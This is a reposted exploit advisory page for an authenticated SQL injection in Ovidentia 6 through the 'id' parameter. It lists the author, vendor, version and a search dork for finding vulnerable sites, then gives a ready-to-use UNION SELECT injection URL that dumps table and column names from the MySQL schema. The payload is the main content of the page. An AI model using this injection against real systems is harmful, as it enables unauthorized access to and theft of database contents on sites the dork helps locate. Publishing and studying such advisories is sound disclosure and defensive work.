Ovidentia 6 – ‘id’ SQL injection (Authenticated) – Digitalmunition




Exploit/Advisories spider-orange.png

Published on March 25th, 2021 📆 | 2270 Views ⚑

0

Ovidentia 6 – ‘id’ SQL injection (Authenticated)

# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
# Exploit Author: Felipe Prates Donato (m4ud)
# Vendor Homepage: http://www.ovidentia.org
# Version: 6
# DORK : "Powered by Ovidentia"    

http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"rn") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--
            

Source link

Tagged with:



Leave a Reply